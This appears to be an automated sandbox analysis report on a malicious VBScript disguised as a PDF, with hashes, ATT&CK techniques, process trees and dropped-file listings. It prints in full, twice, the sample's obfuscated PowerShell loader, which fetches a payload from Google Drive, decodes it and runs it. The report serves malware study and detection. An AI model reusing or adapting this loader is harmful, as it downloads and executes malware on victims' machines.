eb1183f6f4fa252c4f3b66ae4424bc7785eaf3089ba89dafc86e5a8393ff6c01

General

Target

SIGN_O0305538279·pdf.vbs
Size

674KB
MD5

ee18a12f0c79b4ac228025b83ec43938
SHA1

f29ad3e06b23e7aacca219fd747fde72f9d5162a
SHA256

22a2cfbda9c7a790c6d1c3771c5a93cabc30abacb83670c73f3844fc49b23416
SHA512

cbeecf8447415a4050f9e79304287d8eab0000f7a2a4afee5b4c350ef76dae228d4fcf7dc2ba0563ba2723a8596c6b08c11bca77b95dde0b14270ab0bb0baea6
SSDEEP

12288:3c/6T75JYBpvoalqV9PjpfgtQY+yveJ0Psg/:3c65uBpD0bPjpfZMeyz

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 988 WScript.exe
8 4156 powershell.exe
15 4156 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

7 drive.google.com
8 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4840 1368 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

4156 powershell.exe
4156 powershell.exe
1368 powershell.exe
1368 powershell.exe
1368 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4156 powershell.exe
Token: SeDebugPrivilege 1368 powershell.exe

flow	pid	process
3	988	WScript.exe
8	4156	powershell.exe
15	4156	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
7	drive.google.com
8	drive.google.com

pid	pid_target	process	target process
4840	1368	WerFault.exe	powershell.exe

pid	process
4156	powershell.exe
4156	powershell.exe
1368	powershell.exe
1368	powershell.exe
1368	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	1368	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 988 wrote to memory of 4156	988	WScript.exe	powershell.exe
PID 988 wrote to memory of 4156	988	WScript.exe	powershell.exe
PID 4156 wrote to memory of 3644	4156	powershell.exe	cmd.exe
PID 4156 wrote to memory of 3644	4156	powershell.exe	cmd.exe
PID 4156 wrote to memory of 1368	4156	powershell.exe	powershell.exe
PID 4156 wrote to memory of 1368	4156	powershell.exe	powershell.exe
PID 4156 wrote to memory of 1368	4156	powershell.exe	powershell.exe
PID 1368 wrote to memory of 2080	1368	powershell.exe	cmd.exe
PID 1368 wrote to memory of 2080	1368	powershell.exe	cmd.exe
PID 1368 wrote to memory of 2080	1368	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SIGN_O0305538279·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bimlet = 1;$Goldcup='Substrin';$Goldcup+='g';Function Afsondrede($Bernhardine){$Classicalises=$Bernhardine.Length-$Bimlet;For($Fratagendes=7; $Fratagendes -lt $Classicalises; $Fratagendes+=(8)){$Bashawism+=$Bernhardine.$Goldcup.Invoke($Fratagendes, $Bimlet);}$Bashawism;}function Possisdendi($Retare){. ($Impuls) ($Retare);}$Uddrevnes=Afsondrede 'BelbsraMVerdensoefterbrzTooart,iS ntisel ankerflOvers,ra J rhea/Infects5Vicevrt.Implosi0Califor Mas.ina(Feu,erlWOpruln,iAuktionnDiabolud,uperino SavagiwOve hums Massey SupermN Boxca TTrakto. Slentr1Boome.a0Flipper. rianf0Art.ste; Merrie Inds,ndW TransfiFersknenLa ding6Deling,4Chordac;Kulstof GwaineaxEroder,6In,eres4Entrail;U,grate Shah,ntrKvartaavTalbert:Frgerie1praecor2 Brevia1.cturie.Isthmia0P.ychon)Flagsmy GlaukeG TyvekreUlgeligc MinistkFoinstioStraffe/ho,ridi2husking0De,ifus1Ukammer0Bothway0 oprerb1Priskri0 udvikl1Kantone Store,FHomogeniFritidsr Ver,ereScar crfSuperinoOpgivelxTengu,y/Bonasus1Udledni2Naam,as1Kystv n.Hv.lros0Beramme ';$Eftertragtelserne=Afsondrede 'Svags rU BrandssBays,elePseudobrAsk.wge- cantalASka.edegExtermieOverflynPropriet Whirlp ';$Touring=Afsondrede ',temmeghGarvesttUndefautaarvaagpParabolsBothieb:handleb/ Crunod/Virkso dHebr.isr BoblekiLogensivHyposcleTrifoi..FundulugRichardoPa.odisoLoeile g rayerslPutoffseTiaraen. Hyrevoc Coniluore undam Nonsus/Tvilli.uArbejdscProsyfo?malaki,e KommisxHalv rdp Anvendo HusvrtrFjernent Firebl=UnpublidJoggledoKranierwFrightenKontraklNewsiesoMeloneraVividesdJaninam&Svanehai SknsandSilva,m=M.taeol1eivorstZFraktio3YderzonhF,equenTLanignaDPortugiFGallant1Un.locuGsnerperjBilinduEindvarsPTranspiYDiakonib TomiagJ PrsterqrespokeACloudle_registr7 Tronaf5WidishrGLejli.hO Woops,aSaponar- PaaklaxLandskigSnksm.dMGuerdonM TrochaV.rchedvtUdfrdi 1 InvokaabackbenK esignf ';$Regnskabskonsulents=Afsondrede 'Debarke>Jamb.re ';$Impuls=Afsondrede 'Affugteis.uatteeMau,elixIndesta ';$Termotj = Afsondrede ' Unp treCaseharcAncestrhhoben,voBlubber Uheldsv%Tyra.noaHousewapSvmmetup MacrurdUnconfiaAshramutSlemmesaBrspapi%.ntersu\UdraderSReformap.rkningobygge.tkRe,erveeInt midsErythriwSupersqo Lu,tvamTocobaga AwhirrnCauseresImpac,bhD,abetiiLrredskpabusefu.SleepinRVitrageh angasieSymmetr Underud&Laxness&Skarnsk SubchoreNonbearc EigildhTorsdago Ext,os Glovere$ U,unst ';Possisdendi (Afsondrede ' Accele$Fl.mmesg sh ndrl,kikkeloNazaratb Palaeoa GendrilGlyce,o:candlewTBeskrivrPejlkomiKonomimmCrys.alaImbricacBereg ieWhortler Flad u= Gerat.(windwarcUtopiermIntercadHametzo Da ebo/.atientcanodine Flnge.o$RedeligTBentstaeBagkropr Akersdm CarnaloTransfetAsymptoj ,reatu)Tittetb ');Possisdendi (Afsondrede ' G ndol$Cessatig Smreg lTthe aaoovenwoobBogstavaSacr,sclConnect:Perlus,VSocialgeParametrSnetykne C actinPr vinsaKoll.do=U,viske$religioT NytnknoTradimeuPiculchr Bepatci Fldeskn,olorergConf.ic.U.derpas Char.epQua.ritlTvangsfiBefrie tBumleto(Nedkrad$Circ msR.ightiee Garn igpensakrn Altisos kemotakAccessiaEpitha,b b ucinsPlatitukVegetgcoSterlinn TomgansKredittusk,evoglDrgningeTre idenFramkeyt Stfrons mgikke)Erotoph ');$Touring=$Verena[0];Possisdendi (Afsondrede 'Sero,og$ Dekonsg SkaftslOverhaioFal tosbAfskaffaAfskummlDocum.n:DyslektA Opprespskovb ap RastafrPsy,hoaoModejouvThespisaReputatlP,usgrasOvergan=SpejlkaNDev.tioeKuttensw Calend- Show,fOBrewe.bbMiskredjTorskenePerisarcAferesstDis,res NewshenSSpraysbyJaegarss AabenbtThorougeG aistnmNarkose.StikkedNChiromaeBankkuntOmforde. PredamWla dskieIntravab HjlpsiCJournallVic.rshiSkruenge RevieonChumpr,tKubisti ');Possisdendi (Afsondrede 'Nord.ta$FlypastAParoemipHonni,gpO amiccrglalivioMacushlvOrdinaraRengrinlPanderisIncon.u.Finge,eHNoneleceBedui,ea snrestdAffectieglaspusrStereotsindu ed[Ve.tlig$ Pr.henEUcaleftfEftergitIsoch.oeAnarchirBrands,t VondsirHereditalight,egCalpackt ChokoleAgt,rpal.cleroks Altonse BengalrTakk,vanIndervge Galago]A minis= Perten$ NazareUUnsiccadBruttoidOverwhir.otgunbeBorgerlvBet.ksonLeechlieG,dreplsTjenest ');$Halvguder=Afsondrede '.hockerA Peria,pAkti ejpOpb udsrKedelpaoBallelsvS agfjeaPedestrlNatur os clerid.SwarajeDNor,noroSnold swUdl,gninAnl dnil Stempeo.epatoraByudvikdHemocytFDrainagiJasm nblDolabeleLindied( Roa.sh$uroksesTGriberloTrihydruDasnt er Luffdii Fra.dgnToothi.gSherifa, Redeli$F.esabbB Toothcrmonoamiy Luf lan UndergjKautio e PanicanDokhavnsDopeh.r)Bistria ';$Halvguder=$Trimacer[1]+$Halvguder;$Brynjens=$Trimacer[0];Possisdendi (Afsondrede 'Tidsnok$ Flyverg Antl.rlUnperfooFraraadbHarshlea DehypnlC,stask:,ideoteP.gnehislFaktoraa Tutte,nSikkerhiLuftsprnUndiffie spilletknitrereFi.kedrrPressin= Malfor( UnamalTSubstane Decarbs EfterbtVetiver-Galliu,P PopulaaJamremit TabuerhSerumag Nymphal$DrepaniB Ster.irStyringyFgtni gn Gal,anjPlaskeneAffilianSubcrucsEelin n)Flerbru ');while (!$Planineter) {Possisdendi (Afsondrede 'photogr$ Unco,vgStraalelCarbureoPhot.scbAfdelina OversklFaareho: MonodooAscaridv BombabeFanebrerStephanmLedens e Grundte ispensk.rtekrm=Japacon$Brnde,rt Nomadersc uroiuSkolevseRe andg ') ;Possisdendi $Halvguder;Possisdendi (Afsondrede ' ReliefSBesvimetInviiblaSparrinrUnder otP.ostit-.aggrypSDedolomlV.riabieIdeograeHorsemepPalinur Arbejds4Frantic ');Possisdendi (Afsondrede ' skank $trykke.g traditlWheezinoUnfanatbYerksgtaCranberlPlumul,:BlanksvPJenvr.elVrdif la Aktio,nUdle,eriSpildvanFinansmeProskritSamliv,e Fre frrU.tille= He.ero(TrancenTEvakue eUdviklis vegravtBeachie-SkummenP Sail datangloptIx.didrhove hig Tonlst$Re,piraBmarkedsrFon,teky emonstnT stamejModelbieErythemnStolesdsTri,itr)Selffu. ') ;Possisdendi (Afsondrede 'S upple$FemkantgU.fundel vampevo BundesbNationaaY.ansstlAnskuet:Grader RCh,orotu Retur,tMicrocoaSyndikabtids tea Herr,fgSonantiaPrawnedsMonadol=tavshed$PacchavgStylebolNipsgeno .ilskdbHyp rseaErgotrolFstning: gul vrb efraine,lavysapGetup fiClarinolMrkerddlBesaettaBrndingrturkey,eLynafledRaadgiv+Su.erim+Optrrin% Boligr$Skr,entV HeaveneApoplexrUragrupelystryknUncompea redi.e.WherehecmisinfooHolbae.uUnlobednMungoostSa rist ') ;$Touring=$Verena[$Rutabagas];}Possisdendi (Afsondrede 'Sipidit$ Vrdi,rgBeholdel ,uskedoGonid.cb FluoraaPhotaeslPedalia:AgresvuZNonprino For.vin LejnineSengetrigussblonU alcohd SmreoldEsotropeSpardk lInbreakiJinketcnCo,munigSurfinge .aganin.rtrykksUp ries La srd=Kaet er GlyphoGBerkeleeTatbebstAfdrama-An ttelCSkraabjo.elefonnElmetr tSocialpeSkind unTvang,stcowfl.p Mesal.k$Sme tenB S.adder Need eyInboundn S mplijI entice dsfjennVenvills stendy ');Possisdendi (Afsondrede 'Verific$ForanstgDriblinlMelchitoindiumabApatetiaInkvisilCrepido:CooperaH .mpaira Furan yBjffedewNephreca TraadvgAuxiliaoskalmurnNeotrag efters=Ringesc Capripe[AuktionS DialysyShetlndsForswort Suba.gemand.opm Alfabe.RadbrkkCSnot umoBroodernEp.ncepvOverar,eA,cederrVirksomtAmtsraa]sh,offr:Konfere:Racef.rF PseudarRenholdoMandamumFodboldBgaad,rnaKlammers SteffaeU.dimen6Doveco 4MolasseSInsuffit Anlgsur Ani.boi Gladsan ConvalgHowg,te( Regr s$PhonateZ tyrefooDownshinAb.omineGrundsyiPteros.n Tvetuld RedigednedkastecyklotrlAandrigiStandsfn ophistgAneroideUkiyoesnTem,hulsSorro l)Altoget ');Possisdendi (Afsondrede ' fhngig$ Beslaag MentallRespo so Siks.kb Hypo,yasupercolDiploce: DetaljLTroldesiCiderensT aledstDacryopei,geniorEntreate samle lPaadraglkangrisoIndkrinsV,ldgifeBakterisAf adsk1Borge k7Revestu Afvikli= Inter Underex[ReaccosS,isarchySymb,lesStitchet.eriangeTilsikrmHave,fe.BegirtaTNonascrephotogrx S ortitbiomath. TrochiESpisehunTenrecacStigesdo Raadgid Al.ainiNoner dn AllerggBk.enbu]Spekula:Dispar,:.niversAS,stemtSDrikkevCVerfendI oitynoITaxamet.ParatraG s ndaceCo parttTankefuS Theopht Artillr Nept ni Formu.nEumoirig denime(Fri.age$IndtgtsHAnnulleaDo lessyRadmag.wSoldansa SuppligHypoalioLggedemnUremiaf)Mcc llu ');Possisdendi (Afsondrede 'Thorulf$moyitetghorizonl KejseroDepravebSvale oaGameteslTraumat: RestekVhesteh.adamp ogk casimilFljdrene arsledr adonna=Op.avsr$ FiligrL Sko,briU liftesGrundlotAaringeeJe.strmr Osc lleFakkeltlIrreprelUnc nsto An imosSptmejseVer.inls C.obda1Midmorn7M llemt.MartressAlveoleuYo.denmbNoncomps FunktitCienegar TuskliiSanerennautarkigAppa.ac(Follett3unarray3Goodwil9Gymnas.6A,pulle8lnstign7Del.bar,Flovtd,2Metaple8Dingd,n8 Differ0Ord est7Eurotil)foxfire ');Possisdendi $Vakler;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4156

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spokeswomanship.Rhe && echo $"
3⤵
PID:3644

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bimlet = 1;$Goldcup='Substrin';$Goldcup+='g';Function Afsondrede($Bernhardine){$Classicalises=$Bernhardine.Length-$Bimlet;For($Fratagendes=7; $Fratagendes -lt $Classicalises; $Fratagendes+=(8)){$Bashawism+=$Bernhardine.$Goldcup.Invoke($Fratagendes, $Bimlet);}$Bashawism;}function Possisdendi($Retare){. ($Impuls) ($Retare);}$Uddrevnes=Afsondrede 'BelbsraMVerdensoefterbrzTooart,iS ntisel ankerflOvers,ra J rhea/Infects5Vicevrt.Implosi0Califor Mas.ina(Feu,erlWOpruln,iAuktionnDiabolud,uperino SavagiwOve hums Massey SupermN Boxca TTrakto. Slentr1Boome.a0Flipper. rianf0Art.ste; Merrie Inds,ndW TransfiFersknenLa ding6Deling,4Chordac;Kulstof GwaineaxEroder,6In,eres4Entrail;U,grate Shah,ntrKvartaavTalbert:Frgerie1praecor2 Brevia1.cturie.Isthmia0P.ychon)Flagsmy GlaukeG TyvekreUlgeligc MinistkFoinstioStraffe/ho,ridi2husking0De,ifus1Ukammer0Bothway0 oprerb1Priskri0 udvikl1Kantone Store,FHomogeniFritidsr Ver,ereScar crfSuperinoOpgivelxTengu,y/Bonasus1Udledni2Naam,as1Kystv n.Hv.lros0Beramme ';$Eftertragtelserne=Afsondrede 'Svags rU BrandssBays,elePseudobrAsk.wge- cantalASka.edegExtermieOverflynPropriet Whirlp ';$Touring=Afsondrede ',temmeghGarvesttUndefautaarvaagpParabolsBothieb:handleb/ Crunod/Virkso dHebr.isr BoblekiLogensivHyposcleTrifoi..FundulugRichardoPa.odisoLoeile g rayerslPutoffseTiaraen. Hyrevoc Coniluore undam Nonsus/Tvilli.uArbejdscProsyfo?malaki,e KommisxHalv rdp Anvendo HusvrtrFjernent Firebl=UnpublidJoggledoKranierwFrightenKontraklNewsiesoMeloneraVividesdJaninam&Svanehai SknsandSilva,m=M.taeol1eivorstZFraktio3YderzonhF,equenTLanignaDPortugiFGallant1Un.locuGsnerperjBilinduEindvarsPTranspiYDiakonib TomiagJ PrsterqrespokeACloudle_registr7 Tronaf5WidishrGLejli.hO Woops,aSaponar- PaaklaxLandskigSnksm.dMGuerdonM TrochaV.rchedvtUdfrdi 1 InvokaabackbenK esignf ';$Regnskabskonsulents=Afsondrede 'Debarke>Jamb.re ';$Impuls=Afsondrede 'Affugteis.uatteeMau,elixIndesta ';$Termotj = Afsondrede ' Unp treCaseharcAncestrhhoben,voBlubber Uheldsv%Tyra.noaHousewapSvmmetup MacrurdUnconfiaAshramutSlemmesaBrspapi%.ntersu\UdraderSReformap.rkningobygge.tkRe,erveeInt midsErythriwSupersqo Lu,tvamTocobaga AwhirrnCauseresImpac,bhD,abetiiLrredskpabusefu.SleepinRVitrageh angasieSymmetr Underud&Laxness&Skarnsk SubchoreNonbearc EigildhTorsdago Ext,os Glovere$ U,unst ';Possisdendi (Afsondrede ' Accele$Fl.mmesg sh ndrl,kikkeloNazaratb Palaeoa GendrilGlyce,o:candlewTBeskrivrPejlkomiKonomimmCrys.alaImbricacBereg ieWhortler Flad u= Gerat.(windwarcUtopiermIntercadHametzo Da ebo/.atientcanodine Flnge.o$RedeligTBentstaeBagkropr Akersdm CarnaloTransfetAsymptoj ,reatu)Tittetb ');Possisdendi (Afsondrede ' G ndol$Cessatig Smreg lTthe aaoovenwoobBogstavaSacr,sclConnect:Perlus,VSocialgeParametrSnetykne C actinPr vinsaKoll.do=U,viske$religioT NytnknoTradimeuPiculchr Bepatci Fldeskn,olorergConf.ic.U.derpas Char.epQua.ritlTvangsfiBefrie tBumleto(Nedkrad$Circ msR.ightiee Garn igpensakrn Altisos kemotakAccessiaEpitha,b b ucinsPlatitukVegetgcoSterlinn TomgansKredittusk,evoglDrgningeTre idenFramkeyt Stfrons mgikke)Erotoph ');$Touring=$Verena[0];Possisdendi (Afsondrede 'Sero,og$ Dekonsg SkaftslOverhaioFal tosbAfskaffaAfskummlDocum.n:DyslektA Opprespskovb ap RastafrPsy,hoaoModejouvThespisaReputatlP,usgrasOvergan=SpejlkaNDev.tioeKuttensw Calend- Show,fOBrewe.bbMiskredjTorskenePerisarcAferesstDis,res NewshenSSpraysbyJaegarss AabenbtThorougeG aistnmNarkose.StikkedNChiromaeBankkuntOmforde. PredamWla dskieIntravab HjlpsiCJournallVic.rshiSkruenge RevieonChumpr,tKubisti ');Possisdendi (Afsondrede 'Nord.ta$FlypastAParoemipHonni,gpO amiccrglalivioMacushlvOrdinaraRengrinlPanderisIncon.u.Finge,eHNoneleceBedui,ea snrestdAffectieglaspusrStereotsindu ed[Ve.tlig$ Pr.henEUcaleftfEftergitIsoch.oeAnarchirBrands,t VondsirHereditalight,egCalpackt ChokoleAgt,rpal.cleroks Altonse BengalrTakk,vanIndervge Galago]A minis= Perten$ NazareUUnsiccadBruttoidOverwhir.otgunbeBorgerlvBet.ksonLeechlieG,dreplsTjenest ');$Halvguder=Afsondrede '.hockerA Peria,pAkti ejpOpb udsrKedelpaoBallelsvS agfjeaPedestrlNatur os clerid.SwarajeDNor,noroSnold swUdl,gninAnl dnil Stempeo.epatoraByudvikdHemocytFDrainagiJasm nblDolabeleLindied( Roa.sh$uroksesTGriberloTrihydruDasnt er Luffdii Fra.dgnToothi.gSherifa, Redeli$F.esabbB Toothcrmonoamiy Luf lan UndergjKautio e PanicanDokhavnsDopeh.r)Bistria ';$Halvguder=$Trimacer[1]+$Halvguder;$Brynjens=$Trimacer[0];Possisdendi (Afsondrede 'Tidsnok$ Flyverg Antl.rlUnperfooFraraadbHarshlea DehypnlC,stask:,ideoteP.gnehislFaktoraa Tutte,nSikkerhiLuftsprnUndiffie spilletknitrereFi.kedrrPressin= Malfor( UnamalTSubstane Decarbs EfterbtVetiver-Galliu,P PopulaaJamremit TabuerhSerumag Nymphal$DrepaniB Ster.irStyringyFgtni gn Gal,anjPlaskeneAffilianSubcrucsEelin n)Flerbru ');while (!$Planineter) {Possisdendi (Afsondrede 'photogr$ Unco,vgStraalelCarbureoPhot.scbAfdelina OversklFaareho: MonodooAscaridv BombabeFanebrerStephanmLedens e Grundte ispensk.rtekrm=Japacon$Brnde,rt Nomadersc uroiuSkolevseRe andg ') ;Possisdendi $Halvguder;Possisdendi (Afsondrede ' ReliefSBesvimetInviiblaSparrinrUnder otP.ostit-.aggrypSDedolomlV.riabieIdeograeHorsemepPalinur Arbejds4Frantic ');Possisdendi (Afsondrede ' skank $trykke.g traditlWheezinoUnfanatbYerksgtaCranberlPlumul,:BlanksvPJenvr.elVrdif la Aktio,nUdle,eriSpildvanFinansmeProskritSamliv,e Fre frrU.tille= He.ero(TrancenTEvakue eUdviklis vegravtBeachie-SkummenP Sail datangloptIx.didrhove hig Tonlst$Re,piraBmarkedsrFon,teky emonstnT stamejModelbieErythemnStolesdsTri,itr)Selffu. ') ;Possisdendi (Afsondrede 'S upple$FemkantgU.fundel vampevo BundesbNationaaY.ansstlAnskuet:Grader RCh,orotu Retur,tMicrocoaSyndikabtids tea Herr,fgSonantiaPrawnedsMonadol=tavshed$PacchavgStylebolNipsgeno .ilskdbHyp rseaErgotrolFstning: gul vrb efraine,lavysapGetup fiClarinolMrkerddlBesaettaBrndingrturkey,eLynafledRaadgiv+Su.erim+Optrrin% Boligr$Skr,entV HeaveneApoplexrUragrupelystryknUncompea redi.e.WherehecmisinfooHolbae.uUnlobednMungoostSa rist ') ;$Touring=$Verena[$Rutabagas];}Possisdendi (Afsondrede 'Sipidit$ Vrdi,rgBeholdel ,uskedoGonid.cb FluoraaPhotaeslPedalia:AgresvuZNonprino For.vin LejnineSengetrigussblonU alcohd SmreoldEsotropeSpardk lInbreakiJinketcnCo,munigSurfinge .aganin.rtrykksUp ries La srd=Kaet er GlyphoGBerkeleeTatbebstAfdrama-An ttelCSkraabjo.elefonnElmetr tSocialpeSkind unTvang,stcowfl.p Mesal.k$Sme tenB S.adder Need eyInboundn S mplijI entice dsfjennVenvills stendy ');Possisdendi (Afsondrede 'Verific$ForanstgDriblinlMelchitoindiumabApatetiaInkvisilCrepido:CooperaH .mpaira Furan yBjffedewNephreca TraadvgAuxiliaoskalmurnNeotrag efters=Ringesc Capripe[AuktionS DialysyShetlndsForswort Suba.gemand.opm Alfabe.RadbrkkCSnot umoBroodernEp.ncepvOverar,eA,cederrVirksomtAmtsraa]sh,offr:Konfere:Racef.rF PseudarRenholdoMandamumFodboldBgaad,rnaKlammers SteffaeU.dimen6Doveco 4MolasseSInsuffit Anlgsur Ani.boi Gladsan ConvalgHowg,te( Regr s$PhonateZ tyrefooDownshinAb.omineGrundsyiPteros.n Tvetuld RedigednedkastecyklotrlAandrigiStandsfn ophistgAneroideUkiyoesnTem,hulsSorro l)Altoget ');Possisdendi (Afsondrede ' fhngig$ Beslaag MentallRespo so Siks.kb Hypo,yasupercolDiploce: DetaljLTroldesiCiderensT aledstDacryopei,geniorEntreate samle lPaadraglkangrisoIndkrinsV,ldgifeBakterisAf adsk1Borge k7Revestu Afvikli= Inter Underex[ReaccosS,isarchySymb,lesStitchet.eriangeTilsikrmHave,fe.BegirtaTNonascrephotogrx S ortitbiomath. TrochiESpisehunTenrecacStigesdo Raadgid Al.ainiNoner dn AllerggBk.enbu]Spekula:Dispar,:.niversAS,stemtSDrikkevCVerfendI oitynoITaxamet.ParatraG s ndaceCo parttTankefuS Theopht Artillr Nept ni Formu.nEumoirig denime(Fri.age$IndtgtsHAnnulleaDo lessyRadmag.wSoldansa SuppligHypoalioLggedemnUremiaf)Mcc llu ');Possisdendi (Afsondrede 'Thorulf$moyitetghorizonl KejseroDepravebSvale oaGameteslTraumat: RestekVhesteh.adamp ogk casimilFljdrene arsledr adonna=Op.avsr$ FiligrL Sko,briU liftesGrundlotAaringeeJe.strmr Osc lleFakkeltlIrreprelUnc nsto An imosSptmejseVer.inls C.obda1Midmorn7M llemt.MartressAlveoleuYo.denmbNoncomps FunktitCienegar TuskliiSanerennautarkigAppa.ac(Follett3unarray3Goodwil9Gymnas.6A,pulle8lnstign7Del.bar,Flovtd,2Metaple8Dingd,n8 Differ0Ord est7Eurotil)foxfire ');Possisdendi $Vakler;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spokeswomanship.Rhe && echo $"
4⤵
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 2364
4⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1368 -ip 1368
1⤵
PID:2612

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mejotqh2.dzt.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\halines.txt
Filesize
1KB

MD5
932b3ba40db7fa228094172c19db8bf5

SHA1
d69478b30ec37dc5d6e2b472ba34de40e9fec7ed

SHA256
898771a0b136409d8310250ead0dd2491441cd51c6ffefeded4df0b705871d0d

SHA512
db57044ef8f8046ef90d29850bb2a2913812d3e1838c2474ecdb08f766d9641484bfa817fa8a01e4cf361250a806772108e07a229b413fd92ecaa43adc9bda62

Download Submit
C:\Users\Admin\AppData\Local\Temp\halines.txt
Filesize
4KB

MD5
3b007215e0cedfc7a6bb91c2895c256f

SHA1
810e5125132c987377ef2dccf3c27a39a1b7baa1

SHA256
b124e61cd4a588ea9eebfe6265d97a0c9e19d1abb55c25ed19bdbe107a01ad5a

SHA512
75e753a83426b963d6a45c04f8907e206ab1aac0f4153b4572b810b4fdfc66dee0d7034804efd604a6c3105e4073541e0ae10ae41cefb732de59295053e6b48e

Download Submit
C:\Users\Admin\AppData\Roaming\Spokeswomanship.Rhe
Filesize
479KB

MD5
268cb393c177de97764a4e2bdf0a498a

SHA1
d78428edb2d0819cf0ed85b4c63a486e345a0d19

SHA256
864805b7ad9e45d086e51f7807880c5f47537612d4861f009db65ab2987c22b4

SHA512
70d3a493ae06d128dbc33689c3f1fc1d1c3571c7d9a1d3d3ca4d0a6aabb4b80c6c7bf05189ff10df0a0c93c6a2a6d938c8f3fadef18be4bd56c46aba8f4c78a6

Download Submit
memory/1368-338-0x00000000081F0000-0x000000000886A000-memory.dmp

Filesize
6.5MB

Download
memory/1368-335-0x0000000006390000-0x00000000066E4000-memory.dmp

Filesize
3.3MB

Download
memory/1368-344-0x00000000744B0000-0x0000000074C60000-memory.dmp

Filesize
7.7MB

Download
memory/1368-319-0x00000000744B0000-0x0000000074C60000-memory.dmp

Filesize
7.7MB

Download
memory/1368-318-0x0000000003020000-0x0000000003056000-memory.dmp

Filesize
216KB

Download
memory/1368-320-0x0000000005580000-0x0000000005590000-memory.dmp

Filesize
64KB

Download
memory/1368-321-0x0000000005580000-0x0000000005590000-memory.dmp

Filesize
64KB

Download
memory/1368-322-0x0000000005BC0000-0x00000000061E8000-memory.dmp

Filesize
6.2MB

Download
memory/1368-323-0x0000000005B10000-0x0000000005B32000-memory.dmp

Filesize
136KB

Download
memory/1368-324-0x00000000061F0000-0x0000000006256000-memory.dmp

Filesize
408KB

Download
memory/1368-325-0x0000000006260000-0x00000000062C6000-memory.dmp

Filesize
408KB

Download
memory/1368-342-0x0000000008E20000-0x00000000093C4000-memory.dmp

Filesize
5.6MB

Download
memory/1368-336-0x00000000069B0000-0x00000000069CE000-memory.dmp

Filesize
120KB

Download
memory/1368-337-0x00000000069E0000-0x0000000006A2C000-memory.dmp

Filesize
304KB

Download
memory/1368-341-0x0000000007BF0000-0x0000000007C12000-memory.dmp

Filesize
136KB

Download
memory/1368-339-0x0000000006F20000-0x0000000006F3A000-memory.dmp

Filesize
104KB

Download
memory/1368-340-0x0000000007C50000-0x0000000007CE6000-memory.dmp

Filesize
600KB

Download
memory/4156-313-0x00007FFF986A0000-0x00007FFF99161000-memory.dmp

Filesize
10.8MB

Download
memory/4156-314-0x0000022673690000-0x00000226736A0000-memory.dmp

Filesize
64KB

Download
memory/4156-308-0x000002265B020000-0x000002265B042000-memory.dmp

Filesize
136KB

Download
memory/4156-317-0x0000022673690000-0x00000226736A0000-memory.dmp

Filesize
64KB

Download
memory/4156-347-0x00007FFF986A0000-0x00007FFF99161000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing